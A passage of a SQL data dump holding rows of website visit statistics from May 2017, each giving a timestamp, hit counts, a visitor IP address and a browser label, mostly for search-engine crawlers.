182.132.154','other'),(108388,1494350216,1,1,0,0,'93.158.152.79','other'),(108389,1494350218,1,1,0,0,'141.8.142.154','other'),(108390,1494350260,2,2,0,0,'5.255.253.63','other'),(108391,1494350312,1,1,0,0,'217.182.132.31','other'),(108392,1494350420,1,1,0,0,'141.8.142.9','other'),(108393,1494350422,1,1,0,0,'141.8.142.97','other'),(108394,1494350425,1,1,0,0,'178.154.200.41','other'),(108395,1494350431,1,1,0,0,'5.255.253.81','other'),(108396,1494350437,1,1,0,0,'95.108.213.7','other'),(108397,1494350444,1,1,0,0,'178.154.189.29','other'),(108398,1494350449,1,1,0,0,'5.255.253.31','other'),(108399,1494350453,1,1,0,0,'95.108.179.21','other'),(108400,1494350666,1,1,0,0,'164.132.162.154','other'),(108401,1494350707,1,1,0,0,'89.252.43.53','chrome'),(108402,1494350722,1,1,0,0,'8.29.198.27','other'),(108403,1494351345,1,1,0,0,'91.196.178.36','chrome'),(108404,1494351509,1,1,0,0,'78.154.190.152','chrome'),(108405,1494351516,1,1,0,0,'217.182.132.7','other'),(108406,1494351621,1,0,1,0,'68.180.228.49',''),(108407,1494351665,1,1,0,0,'137.74.207.116','other'),(108408,1494351923,1,1,0,0,'46.48.13.161','chrome'),(108409,1494352375,1,1,0,0,'164.132.161.94','other'),(108410,1494352438,1,1,0,0,'95.108.213.34','other'),(108411,1494352504,1,1,0,0,'141.8.142.15','other'),(108412,1494352945,1,1,0,0,'51.255.65.29','other'),(108413,1494353074,1,1,0,0,'217.182.132.67','other'),(108414,1494353363,1,1,0,0,'94.178.6.16','chrome'),(108415,1494353598,1,1,0,0,'217.182.132.91','other'),(108416,1494353711,1,1,0,0,'51.255.65.28','other'),(108417,1494353736,1,0,1,0,'66.249.76.91',''),(108418,1494353925,1,1,0,0,'217.182.132.65','other'),(108419,1494354068,1,1,0,0,'69.30.213.82','other'),(108420,1494354101,1,1,0,0,'51.255.65.48','other'),(108421,1494354332,1,1,0,0,'164.132.161.79','other'),(108422,1494354369,1,1,0,0,'176.195.112.66','msie'),(108423,1494354499,1,0,1,0,'66.249.66.202',''),(108424,1494354752,1,1,0,0,'194.44.244.130','msie'),(108425,1494354753,1,1,0,0,'66.102.9.25','chrome'),(108426,1494354920,1,1,0,0,'194.28.7.140','chrome'),(108427,1494355256,1,1,0,0,'164.132.161.96','other'),(108428,1494355363,1,1,0,0,'91.196.178.36','chrome'),(108429,1494355395,1,1,0,0,'37.52.20.104','chrome'),(108430,1494355449,1,1,0,0,'91.196.178.135','chrome'),(108431,1494355459,1,1,0,0,'51.255.65.35','other'),(108432,1494355685,1,0,1,0,'68.180.228.49',''),(108433,1494355745,1,1,0,0,'51.255.65.76','other'),(108434,1494356107,1,1,0,0,'217.182.132.148','other'),(108435,1494356118,1,1,0,0,'91.196.178.161','chrome'),(108436,1494356165,1,1,0,0,'217.182.132.182','other'),(108437,1494356238,1,1,0,0,'164.132.161.58','other'),(108438,1494356902,1,1,0,0,'164.132.161.3','other'),(108439,1494357284,1,0,1,0,'66.249.76.91',''),(108440,1494357665,1,1,0,0,'51.255.71.118','other'),(108441,1494357677,1,1,0,0,'164.132.161.8','other'),(108442,1494357861,1,1,0,0,'78.111.185.71','chrome'),(108443,1494358014,1,1,0,0,'51.255.65.17','other'),(108444,1494358070,1,1,0,0,'180.76.15.158','other'),(108445,1494358129,1,0,1,0,'66.249.66.197',''),(108446,1494358231,1,1,0,0,'217.182.132.63','other'),(108447,1494358242,1,1,0,0,'176.8.141.224','chrome'),(108448,1494358564,1,1,0,0,'51.255.65.59','other'),(108449,1494358623,1,1,0,0,'217.182.132.148','other'),(108450,1494358925,1,1,0,0,'164.132.161.83','other'),(108451,1494359259,1,1,0,0,'109.63.172.211','chrome'),(108452,1494360100,1,1,0,0,'137.74.201.100','other'),(108453,1494360291,1,1,0,0,'54.165.59.7','other'),(108454,1494360584,1,1,0,0,'157.55.39.90','other'),(108455,1494360875,1,1,0,0,'217.182.132.20','other'),(108456,1494361167,1,1,0,0,'164.132.161.94','other'),(108457,1494361443,1,1,0,0,'91.209.11.236','other'),(108458,1494361551,1,1,0,0,'8.29.198.25','other'),(108459,1494361959,1,1,0,0,'164.132.161.38','other'),(108460,1494361990,1,1,0,0,'217.182.132.19','other'),(108461,1494362843,1,1,0,0,'51.255.65.59','other'),(108462,1494362912,1,1,0,0,'217.182.132.51','other'),(108463,1494363036,1,1,0,0,'217.182.132.185','other'),(108464,1494363038,1,1,0,0,'91.196.178.162','chrome'),(108465,1494363072,1,1,0,0,'51.255.65.29','other'),(108466,1494363366,1,1,0,0,'51.255.65.6','other'),(108467,1494363498,1,1,0,0,'164.132.161.8','other'),(108469,1494363509,1,0,1,0,'66.249.76.107',''),(108470,1494363553,1,1,0,0,'51.255.65.86','other'),(108471,1494363739,1,1,0,0,'217.182.132.29','other'),(108472,1494363895,1,1,0,0,'164.132.161.65','other'),(108473,1494364402,1,0,1,0,'66.249.76.89',''),(108474,1494364940,1,1,0,0,'164.132.161.39','other'),(108475,1494365297,1,0,1,0,'66.249.66.180',''),(108476,1494365772,1,1,0,0,'217.182.132.173','other'),(108477,1494365846,1,1,0,0,'217.182.132.184','other'),(108478,1494366787,1,1,0,0,'217.182.132.90','other'),(108479,1494368075,1,1,0,0,'164.132.161.41','other'),(108480,1494368523,1,1,0,0,'51.255.65.82','other'),(108481,1494368760,1,1,0,0,'164.132.161.25','other'),(108482,1494368814,1,1,0,0,'217.182.132.172','other'),(108483,1494369195,1,1,0,0,'95.108.213.34','other'),(108484,1494369705,1,0,1,0,'66.249.76.109',''),(108485,1494369780,1,1,0,0,'164.132.161.73','other'),(108486,1494369994,1,1,0,0,'217.182.132.76','other'),(108487,1494370259,1,1,0,0,'217.182.132.172','other'),(108488,1494370305,1,1,0,0,'217.182.132.77','other'),(108489,1494370725,1,1,0,0,'51.255.65.12','other'),(108490,1494371653,1,1,0,0,'51.255.65.30','other'),(108491,1494371676,1,1,0,0,'51.255.65.7','other'),(108492,1494371925,1,0,1,0,'68.180.228.49',''),(108493,1494372032,1,1,0,0,'51.255.65.9','other'),(108494,1494372381,1,1,0,0,'8.29.198.27','other'),(108495,1494372685,1,0,1,0,'66.249.76.93',''),(108496,1494372834,1,0,1,0,'66.249.76.108',''),(108497,1494373230,2,0,2,0,'66.249.66.183',''),(108498,1494373248,1,0,1,0,'66.249.76.89',''),(108499,1494374292,1,1,0,0,'164.132.161.54','other'),(108500,1494374446,1,0,1,0,'68.180.228.49',''),(108501,1494374638,1,1,0,0,'217.182.132.72','other'),(108502,1494374680,1,1,0,0,'51.255.65.90','other'),(108503,1494374780,1,1,0,0,'51.255.65.20','other'),(108504,1494374937,1,0,1,0,'157.55.39.90',''),(108505,1494375036,1,1,0,0,'217.182.132.76','other'),(108506,1494375189,1,1,0,0,'217.182.132.241','other'),(108507,1494375226,1,1,0,0,'217.182.132.34','other'),(108508,1494376178,1,0,1,0,'157.55.39.90',''),(108509,1494376217,1,0,1,0,'66.249.66.87',''),(108510,1494376694,1,1,0,0,'217.182.132.156','other'),(108511,1494377241,1,1,0,0,'217.182.132.53','other'),(108512,1494377382,2,0,2,0,'66.249.76.89',''),(108513,1494377481,1,0,1,0,'66.249.76.108',''),(108514,1494377503,1,0,1,0,'66.249.66.177',''),(108515,1494377841,1,1,0,0,'164.132.161.33','other'),(108516,1494377959,1,0,1,0,'66.249.66.87',''),(108517,1494378071,1,1,0,0,'164.132.161.94','other'),(108518,1494378347,1,1,0,0,'217.182.132.93','other'),(108519,1494379039,1,1,0,0,'51.255.65.224','other'),(108520,1494379327,1,1,0,0,'137.74.201.100','other'),(108521,1494379937,1,1,0,0,'164.132.161.75','other'),(108522,1494380096,1,1,0,0,'217.182.132.70','other'),(108523,1494380681,1,1,0,0,'217.182.132.173','other'),(108524,1494381147,6,6,0,0,'95.108.213.7','other'),(108525,1494381151,4,4,0,0,'5.255.253.58','other'),(108526,1494381155,5,5,0,0,'141.8.142.38','other'),(108527,1494381159,2,2,0,0,'95.108.213.8','other'),(108528,1494381164,6,6,0,0,'95.108.213.34','other'),(108529,1494381235,4,4,0,0,'5.255.253.63','other'),(108530,1494381239,8,8,0,0,'95.108.179.15','other'),(108531,1494381248,9,9,0,0,'141.8.142.154','other'),(108532,1494381265,5,5,0,0,'141.8.142.15','other'),(108533,1494381287,2,2,0,0,'178.154.200.37','other'),(108534,1494381316,3,3,0,0,'141.8.142.164','other'),(108535,1494381319,1,1,0,0,'5.255.253.81','other'),(108536,1494381326,1,1,0,0,'178.154.200.45','other'),(108537,1494381333,1,1,0,0,'93.158.152.60','other'),(108538,1494381336,1,1,0,0,'141.8.142.97','other'),(108539,1494382633,1,1,0,0,'217.182.132.16','other'),(108540,1494383112,2,0,2,0,'66.249.76.91',''),(108541,1494383210,1,1,0,0,'8.29.198.26','other'),(108542,1494383472,1,1,0,0,'217.182.132.24','other'),(108543,1494384465,1,0,1,0,'66.249.76.107',''),(108544,1494385099,1,1,0,0,'216.244.66.237','other'),(108545,1494385146,1,1,0,0,'51.255.65.75','other'),(108546,1494385258,1,1,0,0,'217.182.132.4','other'),(108547,1494385383,1,1,0,0,'51.255.65.40','other'),(108548,1494385521,1,1,0,0,'217.182.132.69','other'),(108549,1494385970,1,1,0,0,'164.132.161.16','other'),(108550,1494386274,1,1,0,0,'217.182.132.188','other'),(108551,1494386368,1,1,0,0,'51.255.65.37','other'),(108552,1494386791,1,1,0,0,'207.46.13.93','other'),(108553,1494386915,1,1,0,0,'164.132.161.36','other'),(108554,1494386972,1,0,1,0,'66.249.76.109',''),(108555,1494387043,1,1,0,0,'164.132.161.54','other'),(108556,1494387485,1,1,0,0,'216.244.66.237','other'),(108557,1494387653,1,1,0,0,'51.255.65.36','other'),(108558,1494387760,1,1,0,0,'217.182.132.172','other'),(108559,1494387863,1,1,0,0,'51.255.65.9','other'),(108560,1494388011,1,1,0,0,'137.74.207.159','other'),(108561,1494388105,1,1,0,0,'51.255.65.71','other'),(108562,1494388124,1,0,1,0,'66.249.76.93',''),(108563,1494388135,1,0,1,0,'66.249.66.84',''),(108564,1494388286,1,1,0,0,'51.255.71.101','other'),(108565,1494388554,1,1,0,0,'164.132.162.154','other'),(108566,1494388715,1,1,0,0,'51.255.65.44','other'),(108567,1494388883,1,1,0,0,'164.132.162.159','other'),(108568,1494389032,2,0,2,0,'68.180.228.49',''),(108569,1494389215,1,0,1,0,'66.249.76.109',''),(108570,1494389424,1,1,0,0,'51.255.65.63','other'),(108571,1494389899,1,1,0,0,'164.132.161.47','other'),(108572,1494390362,2,0,2,0,'68.180.228.49',''),(108573,1494391248,1,1,0,0,'91.196.178.68','firefox'),(108574,1494392383,1,1,0,0,'91.196.178.68','chrome'),(108575,1494392870,1,1,0,0,'217.182.132.7','other'),(108576,1494392882,1,1,0,0,'51.255.65.88','other'),(108577,1494392906,1,0,1,0,'66.249.76.109',''),(108578,1494393279,1,1,0,0,'51.255.71.122','other'),(108579,1494393284,1,0,1,0,'66.249.66.81',''),(108580,1494393338,1,0,1,0,'66.249.66.87',''),(108581,1494393892,1,0,1,0,'66.249.76.109',''),(108582,1494394039,1,1,0,0,'8.29.198.26','other'),(108583,1494394107,1,1,0,0,'91.196.178.68','firefox'),(108584,1494394203,1,1,0,0,'93.77.76.103','chrome'),(108585,1494394223,1,1,0,0,'51.255.65.91','other'),(108586,1494394601,1,1,0,0,'91.196.178.66','firefox'),(108587,1494394814,1,1,0,0,'91.196.178.71','chrome'),(108588,1494394943,1,1,0,0,'66.102.9.29','chrome'),(108589,1494395090,1,1,0,0,'51.255.65.37','other'),(108590,1494395117,1,1,0,0,'217.182.132.172','other'),(108591,1494395208,1,0,1,0,'66.249.76.109',''),(108592,1494395234,1,1,0,0,'51.255.65.84','other'),(108593,1494395247,1,1,0,0,'91.196.178.68','firefox'),(108594,1494395298,1,1,0,0,'51.255.65.11','other'),(108595,1494395655,1,1,0,0,'31.43.20.110','chrome'),(108596,1494395852,1,1,0,0,'157.55.39.90','other'),(108597,1494396074,1,1,0,0,'95.132.27.147','firefox'),(108598,1494396188,1,1,0,0,'164.132.161.35','other'),(108599,1494396280,1,1,0,0,'91.196.178.33','chrome'),(108600,1494396357,1,1,0,0,'91.196.178.66','firefox'),(108601,1494396887,1,1,0,0,'164.132.161.16','other'),(108602,1494397414,1,1,0,0,'91.196.178.68','chrome'),(108603,1494397643,1,1,0,0,'164.132.161.50','other'),(108604,1494397745,1,1,0,0,'66.249.76.91','chrome'),(108605,1494397765,1,1,0,0,'46.98.9.7','firefox'),(108606,1494397786,1,1,0,0,'66.249.76.108','chrome'),(108607,1494397905,1,1,0,0,'217.182.132.71','other'),(108608,1494397976,1,1,0,0,'37.52.16.196','chrome'),(108609,1494398003,1,0,1,0,'66.249.66.87',''),(108610,1494398318,1,1,0,0,'91.196.178.162','chrome'),(108611,1494398402,1,1,0,0,'51.255.65.72','other'),(108612,1494398407,1,1,0,0,'31.43.20.110','chrome'),(108613,1494398775,1,1,0,0,'91.196.178.68','chrome'),(108614,1494399119,1,1,0,0,'164.132.161.27','other'),(108615,1494399520,1,1,0,0,'94.179.72.210','chrome'),(108616,1494399574,1,1,0,0,'141.8.142.164','other'),(108617,1494399669,1,1,0,0,'164.132.161.46','other'),(108618,1494399965,1,1,0,0,'51.255.65.17','other'),(108619,1494400001,1,1,0,0,'164.132.161.97','other'),(108620,1494400006,1,1,0,0,'207.46.13.102','other'),(108621,1494400170,1,1,0,0,'82.207.45.232','firefox'),(108622,1494400348,1,1,0,0,'31.43.11.164','chrome'),(108623,1494400480,1,1,0,0,'217.182.132.179','other'),(108624,1494400622,2,2,0,0,'91.196.178.40','firefox'),(108625,1494401166,1,1,0,0,'51.255.71.126','other'),(108626,1494401353,1,1,0,0,'164.132.161.25','other'),(108627,1494402009,1,1,0,0,'93.74.212.147','firefox'),(108628,1494402082,2,2,0,0,'5.9.106.230','other'),(108629,1494402572,1,1,0,0,'82.207.49.98','firefox'),(108630,1494402587,1,1,0,0,'95.108.179.15','other'),(108631,1494402939,1,1,0,0,'91.196.177.26','chrome'),(108632,1494403004,2,2,0,0,'93.74.212.147','firefox'),(108633,1494403088,1,0,1,0,'66.249.66.177',''),(108634,1494403216,1,0,1,0,'66.249.66.87',''),(108635,1494403364,1,1,0,0,'91.196.178.66','firefox'),(108636,1494403592,1,1,0,0,'164.132.161.62','other'),(108637,1494403627,1,0,1,0,'66.249.66.84',''),(108638,1494404411,1,1,0,0,'31.134.124.250','chrome'),(108639,1494404423,1,1,0,0,'164.132.162.164','other'),(108640,1494404630,1,1,0,0,'91.196.177.15','chrome'),(108641,1494404805,1,1,0,0,'37.55.151.49','chrome'),(108642,1494404811,1,1,0,0,'91.196.178.130','chrome'),(108643,1494404830,1,1,0,0,'193.107.72.66','chrome'),(108644,1494404834,1,1,0,0,'144.76.8.134','other'),(108645,1494404869,1,1,0,0,'8.29.198.26','other'),(108646,1494404947,1,1,0,0,'95.132.27.147','firefox'),(108647,1494405008,1,0,1,0,'66.249.66.183',''),(108648,1494405026,2,2,0,0,'91.196.178.71','chrome'),(108649,1494405062,1,1,0,0,'95.132.46.11','firefox'),(108650,1494405369,1,1,0,0,'137.74.207.114','other'),(108651,1494405386,1,1,0,0,'51.255.65.35','other'),(108652,1494405426,1,1,0,0,'91.196.178.135','chrome'),(108653,1494405551,1,1,0,0,'51.255.65.88','other'),(108654,1494405632,1,0,1,0,'68.180.231.24',''),(108655,1494405954,1,1,0,0,'217.182.132.93','other'),(108656,1494406159,1,0,1,0,'66.249.66.81',''),(108657,1494406261,1,1,0,0,'51.255.65.3','other'),(108658,1494406308,1,1,0,0,'164.132.161.73','other'),(108659,1494406537,1,0,1,0,'68.180.228.49',''),(108660,1494406550,1,0,1,0,'66.249.66.180',''),(108661,1494406601,1,1,0,0,'51.255.65.57','other'),(108662,1494406775,1,1,0,0,'95.132.27.147','firefox'),(108663,1494406957,1,1,0,0,'91.196.178.71','chrome'),(108664,1494407031,1,1,0,0,'217.182.132.35','other'),(108665,1494407177,1,1,0,0,'217.182.132.32','other'),(108666,1494407297,1,1,0,0,'141.8.142.38','other'),(108667,1494407298,1,1,0,0,'5.255.253.81','other'),(108668,1494407586,1,0,1,0,'66.249.76.108',''),(108669,1494407754,1,1,0,0,'164.132.161.75','other'),(108670,1494407856,1,1,0,0,'217.182.132.182','other'),(108671,1494407953,1,1,0,0,'217.182.132.241','other'),(108672,1494408270,1,1,0,0,'164.132.161.25','other'),(108673,1494408581,1,0,1,0,'68.180.228.49',''),(108674,1494408589,1,0,1,0,'66.249.76.107',''),(108675,1494408628,1,1,0,0,'217.182.132.185','other'),(108676,1494408716,1,1,0,0,'93.74.212.147','firefox'),(108677,1494408759,1,1,0,0,'217.182.132.60','other'),(108678,1494408764,1,1,0,0,'217.182.132.23','other'),(108679,1494408982,2,2,0,0,'91.196.178.135','chrome'),(108680,1494409364,1,1,0,0,'66.102.9.38','chrome'),(108681,1494409434,1,0,1,0,'66.249.76.109',''),(108682,1494409497,1,1,0,0,'51.255.65.56','other'),(108683,1494409754,1,1,0,0,'62.80.169.92','chrome'),(108684,1494410044,1,1,0,0,'91.196.178.66','firefox'),(108685,1494410254,1,1,0,0,'95.135.184.32','chrome'),(108686,1494410538,1,0,1,0,'66.249.76.89',''),(108687,1494410590,1,1,0,0,'164.132.162.159','other'),(108688,1494410876,1,0,1,0,'66.249.76.93',''),(108689,1494411471,1,0,1,0,'68.180.228.49',''),(108690,1494411474,2,2,0,0,'95.135.184.32','chrome'),(108691,1494411667,1,1,0,0,'51.255.65.13','other'),(108692,1494411683,1,1,0,0,'51.255.65.23','other'),(108693,1494411786,1,1,0,0,'37.53.80.217','chrome'),(108694,1494411858,1,1,0,0,'164.132.161.39','other'),(108695,1494412200,1,0,1,0,'66.249.76.28',''),(108696,1494412253,1,1,0,0,'217.182.132.154','other'),(108697,1494412326,1,1,0,0,'91.196.178.162','chrome'),(108698,1494412518,1,0,1,0,'66.249.76.131',''),(108699,1494412552,1,1,0,0,'66.249.76.113','chrome'),(108700,1494412698,2,2,0,0,'62.212.73.211','other'),(108701,1494412804,1,1,0,0,'164.132.161.35','other'),(108702,1494412878,1,1,0,0,'51.255.65.20','other'),(108703,1494413189,1,1,0,0,'195.10.210.49','chrome'),(108704,1494413283,1,0,1,0,'66.249.76.137',''),(108705,1494413314,1,1,0,0,'164.132.161.74','other'),(108706,1494413541,1,1,0,0,'51.255.65.68','other'),(108707,1494413665,1,1,0,0,'217.182.132.21','other'),(108708,1494413773,1,1,0,0,'51.255.71.133','other'),(108709,1494413924,2,2,0,0,'93.74.212.147','firefox'),(108710,1494413991,1,1,0,0,'137.74.207.159','other'),(108711,1494414129,1,0,1,0,'66.249.66.84',''),(108712,1494414974,1,1,0,0,'164.132.161.37','other'),(108713,1494415196,1,1,0,0,'46.200.118.103','chrome'),(108714,1494415571,1,0,1,0,'66.249.66.180',''),(108715,1494415579,1,1,0,0,'51.255.65.57','other'),(108716,1494415702,1,1,0,0,'164.132.161.14','other'),(108717,1494415707,1,1,0,0,'8.29.198.26','other'),(108718,1494417410,1,1,0,0,'91.196.178.68','chrome'),(108719,1494417416,1,1,0,0,'91.196.178.134','firefox'),(108720,1494417444,1,1,0,0,'217.182.132.57','other'),(108721,1494417513,1,1,0,0,'164.132.161.94','other'),(108722,1494417557,1,1,0,0,'137.74.207.164','other'),(108723,1494418115,1,1,0,0,'178.93.101.107','chrome'),(108724,1494418153,1,0,1,0,'66.249.66.183',''),(108725,1494418222,1,1,0,0,'95.108.213.7','other'),(108726,1494418262,1,1,0,0,'178.154.200.45','other'),(108728,1494418336,1,0,1,0,'66.249.66.84',''),(108729,1494418417,1,1,0,0,'51.255.65.10','other'),(108730,1494418620,1,1,0,0,'91.196.178.162','chrome'),(108731,1494418626,1,1,0,0,'51.255.71.116','other'),(108732,1494419149,1,1,0,0,'91.196.178.166','chrome'),(108733,1494419512,1,1,0,0,'94.179.93.70','chrome'),(108734,1494419783,1,1,0,0,'217.182.132.151','other'),(108735,1494420068,1,1,0,0,'91.196.178.162','chrome'),(108736,1494420179,1,1,0,0,'91.196.178.99','chrome'),(108737,1494420257,1,1,0,0,'95.132.27.147','firefox'),(108738,1494420294,1,1,0,0,'164.132.161.10','other'),(108739,1494420395,1,1,0,0,'164.132.161.7','other'),(108740,1494420797,1,1,0,0,'66.249.66.177','chrome'),(108741,1494420989,1,1,0,0,'217.182.132.4','other'),(108742,1494421011,1,1,0,0,'91.196.178.68','chrome'),(108743,1494421497,1,1,0,0,'91.196.178.165','chrome'),(108744,1494421520,1,1,0,0,'164.132.161.48','other'),(108745,1494421843,2,2,0,0,'91.196.178.72','firefox'),(108746,1494422112,1,1,0,0,'51.255.65.84','other'),(108747,1494422148,1,1,0,0,'193.19.152.14','chrome'),(108748,1494422533,1,1,0,0,'91.196.178.167','chrome'),(108749,1494422594,1,1,0,0,'91.196.178.68','chrome'),(108750,1494422864,1,0,1,0,'66.249.66.177',''),(108751,1494422918,1,0,1,0,'66.249.66.87',''),(108752,1494423414,1,1,0,0,'51.255.65.42','other'),(108753,1494423880,1,1,0,0,'217.182.132.75','other'),(108754,1494424188,1,1,0,0,'51.255.65.17','other'),(108755,1494424425,1,1,0,0,'66.249.93.210','chrome'),(108756,1494424433,1,1,0,0,'95.134.184.217','chrome'),(108757,1494424607,1,1,0,0,'164.132.161.19','other'),(108758,1494424653,1,1,0,0,'77.52.192.234','chrome'),(108759,1494425129,1,1,0,0,'91.196.178.68','chrome'),(108760,1494425690,1,1,0,0,'193.19.152.14','chrome'),(108761,1494425840,1,1,0,0,'91.209.11.236','other'),(108762,1494426148,1,0,1,0,'66.249.66.180',''),(108763,1494426173,1,1,0,0,'91.196.178.68','chrome'),(108764,1494426279,1,1,0,0,'164.132.161.10','other'),(108765,1494426289,1,1,0,0,'51.255.65.32','other'),(108766,1494426543,1,1,0,0,'8.29.198.25','other'),(108767,1494426803,1,1,0,0,'91.209.11.236','other'),(108768,1494427345,1,1,0,0,'51.255.65.24','other'),(108769,1494427993,1,1,0,0,'51.255.65.70','other'),(108770,1494428240,1,1,0,0,'207.46.13.102','other'),(108771,1494428269,1,1,0,0,'51.255.65.32','other'),(108772,1494428324,1,1,0,0,'51.255.65.23','other'),(108773,1494428355,1,1,0,0,'66.249.66.183','chrome'),(108774,1494428550,1,1,0,0,'163.172.108.151','chrome'),(108775,1494428750,1,1,0,0,'91.209.11.236','other'),(108776,1494429544,1,1,0,0,'51.255.71.123','other'),(108777,1494429905,1,1,0,0,'137.74.207.170','other'),(108778,1494429907,1,0,1,0,'68.180.228.49',''),(108779,1494429935,1,1,0,0,'164.132.161.90','other'),(108780,1494430235,1,1,0,0,'164.132.161.30','other'),(108781,1494430619,1,1,0,0,'91.209.11.236','other'),(108782,1494430962,1,1,0,0,'91.196.178.67','firefox'),(108783,1494431292,1,0,1,0,'66.249.66.183',''),(108784,1494432032,1,1,0,0,'217.182.132.24','other'),(108785,1494432230,1,1,0,0,'51.255.71.128','other'),(108786,1494432795,1,1,0,0,'51.255.71.132','other'),(108787,1494432926,1,1,0,0,'66.249.66.84','chrome'),(108788,1494432928,1,1,0,0,'66.249.66.180','chrome'),(108789,1494433070,1,0,1,0,'68.180.228.49',''),(108790,1494433522,1,1,0,0,'164.132.161.41','other'),(108791,1494433563,2,0,2,0,'66.249.66.177',''),(108792,1494433634,1,1,0,0,'51.255.71.110','other'),(108793,1494433760,1,1,0,0,'164.132.161.40','other'),(108794,1494433790,1,1,0,0,'217.182.132.181','other'),(108795,1494434196,1,1,0,0,'217.182.132.156','other'),(108796,1494434280,3,3,0,0,'149.202.125.153','other'),(108797,1494434537,1,1,0,0,'217.182.132.29','other'),(108798,1494434717,1,0,1,0,'66.249.66.87',''),(108799,1494436199,1,0,1,0,'157.55.39.90',''),(108800,1494437179,1,1,0,0,'66.249.66.183','chrome'),(108801,1494437203,1,1,0,0,'66.249.66.180','chrome'),(108802,1494437369,1,1,0,0,'8.29.198.25','other'),(108803,1494437579,1,1,0,0,'91.196.178.36','chrome'),(108804,1494438305,1,1,0,0,'91.196.178.167','chrome'),(108805,1494438331,1,1,0,0,'178.154.189.16','other'),(108806,1494439548,1,1,0,0,'93.74.212.147','firefox'),(108807,1494439765,1,1,0,0,'51.255.65.79','other'),(108808,1494439793,2,2,0,0,'217.182.132.76','other'),(108809,1494440079,1,1,0,0,'91.196.178.67','chrome'),(108810,1494440083,1,1,0,0,'164.132.161.78','other'),(108811,1494440469,1,1,0,0,'46.211.65.210','chrome'),(108812,1494441133,1,1,0,0,'91.209.11.236','other'),(108813,1494441589,1,1,0,0,'66.249.66.81','chrome'),(108814,1494441854,1,1,0,0,'51.255.65.95','other'),(108815,1494441877,1,1,0,0,'164.132.161.7','other'),(108816,1494442301,1,1,0,0,'164.132.161.81','other'),(108817,1494442466,1,1,0,0,'217.182.132.59','other'),(108818,1494443345,1,1,0,0,'51.255.65.74','other'),(108819,1494443587,1,1,0,0,'217.182.132.66','other'),(108820,1494443705,1,0,1,0,'68.180.228.113',''),(108821,1494443734,1,1,0,0,'62.210.157.129','other'),(108822,1494443971,1,1,0,0,'217.182.132.15','other'),(108823,1494444272,1,1,0,0,'217.182.132.186','other'),(108824,1494444455,1,1,0,0,'51.255.65.87','other'),(108825,1494444558,1,1,0,0,'40.77.167.34','other'),(108826,1494444728,1,1,0,0,'82.145.221.214','other'),(108827,1494445017,1,1,0,0,'51.255.65.20','other'),(108828,1494445056,1,1,0,0,'164.132.162.158','other'),(108829,1494445349,1,0,1,0,'66.249.66.87',''),(108830,1494445682,2,0,2,0,'66.249.66.177',''),(108831,1494446137,1,0,1,0,'68.180.228.113',''),(108832,1494447057,1,0,1,0,'66.249.66.177',''),(108833,1494448201,1,1,0,0,'8.29.198.27','other'),(108834,1494449263,1,1,0,0,'91.209.11.236','other'),(108835,1494451700,1,0,1,0,'66.249.66.87',''),(108836,1494452400,1,1,0,0,'164.132.161.25','other'),(108837,1494452422,2,0,2,0,'66.249.66.180',''),(108838,1494452515,1,1,0,0,'5.9.106.230','other'),(108839,1494452647,1,1,0,0,'95.108.179.15','other'),(108840,1494452779,1,0,1,0,'68.180.228.113',''),(108841,1494453034,1,1,0,0,'51.255.71.133','other'),(108842,1494453745,1,1,0,0,'51.255.65.5','other'),(108843,1494454162,1,1,0,0,'157.55.39.90','other'),(108844,1494454530,1,1,0,0,'217.182.132.171','other'),(108845,1494454548,1,1,0,0,'164.132.161.57','other'),(108846,1494454816,2,2,0,0,'207.46.13.102','other'),(108847,1494455146,1,0,1,0,'66.249.66.84',''),(108848,1494456130,1,1,0,0,'137.74.201.108','other'),(108849,1494456869,1,1,0,0,'180.76.15.20','other'),(108850,1494456985,1,1,0,0,'137.74.207.188','other'),(108851,1494457368,1,1,0,0,'164.132.161.86','other'),(108852,1494457510,1,1,0,0,'60.180.31.250','other'),(108853,1494457538,1,1,0,0,'217.182.132.180','other'),(108854,1494457755,1,1,0,0,'217.182.132.152','other'),(108855,1494458876,1,1,0,0,'217.182.132.55','other'),(108856,1494459029,1,1,0,0,'8.29.198.25','other'),(108857,1494459312,1,0,1,0,'66.249.76.108',''),(108858,1494459406,1,1,0,0,'163.172.108.151','chrome'),(108859,1494461081,1,1,0,0,'51.255.65.12','other'),(108860,1494461457,1,1,0,0,'217.182.132.29','other'),(108861,1494463039,1,1,0,0,'217.182.132.151','other'),(108862,1494463155,1,0,1,0,'68.180.231.24',''),(108863,1494463323,1,1,0,0,'66.249.76.107','chrome'),(108864,1494463585,1,1,0,0,'207.46.13.93','other'),(108865,1494463723,1,1,0,0,'51.255.71.120','other'),(108866,1494464002,1,1,0,0,'217.182.132.35','other'),(108867,1494464047,1,1,0,0,'164.132.161.6','other'),(108868,1494464068,1,1,0,0,'164.132.161.21','other'),(108869,1494464380,1,1,0,0,'141.8.142.15','other'),(108870,1494464383,1,1,0,0,'93.158.152.79','other'),(108871,1494464387,1,1,0,0,'141.8.142.49','other'),(108872,1494464391,1,1,0,0,'141.8.142.164','other'),(108873,1494464394,1,1,0,0,'51.255.65.67','other'),(108874,1494464607,1,1,0,0,'164.132.161.24','other'),(108875,1494464898,1,0,1,0,'66.249.76.45',''),(108876,1494465391,1,1,0,0,'51.255.65.29','other'),(108877,1494465854,1,1,0,0,'164.132.161.28','other'),(108878,1494466061,1,1,0,0,'51.255.71.126','other'),(108879,1494466103,1,1,0,0,'66.249.76.108','chrome'),(108880,1494466498,1,1,0,0,'164.132.161.67','other'),(108881,1494467417,1,1,0,0,'164.132.164.180','other'),(108882,1494467860,1,1,0,0,'51.255.65.69','other'),(108883,1494468939,1,1,0,0,'51.255.65.224','other'),(108884,1494469480,1,1,0,0,'51.255.65.74','other'),(108885,1494469627,1,1,0,0,'217.182.132.17','other'),(108886,1494469855,1,1,0,0,'8.29.198.26','other'),(108887,1494470016,1,1,0,0,'217.182.132.54','other'),(108888,1494470352,2,0,2,0,'68.180.228.113',''),(108889,1494471099,1,1,0,0,'217.182.132.61','other'),(108890,1494471150,1,1,0,0,'51.255.65.39','other'),(108891,1494471437,1,0,1,0,'66.249.76.109',''),(108892,1494471830,1,1,0,0,'141.0.12.86','other'),(108893,1494471839,1,1,0,0,'164.132.161.15','other'),(108894,1494471919,1,1,0,0,'51.255.65.7','other'),(108895,1494471959,1,1,0,0,'164.132.162.187','other'),(108896,1494472249,1,1,0,0,'217.182.132.22','other'),(108897,1494472453,1,1,0,0,'51.255.65.64','other'),(108898,1494472582,1,1,0,0,'137.74.207.110','other'),(108899,1494472671,1,1,0,0,'51.255.65.6','other'),(108900,1494472693,1,1,0,0,'51.255.65.22','other'),(108901,1494472808,1,1,0,0,'185.26.180.141','other'),(108902,1494474280,1,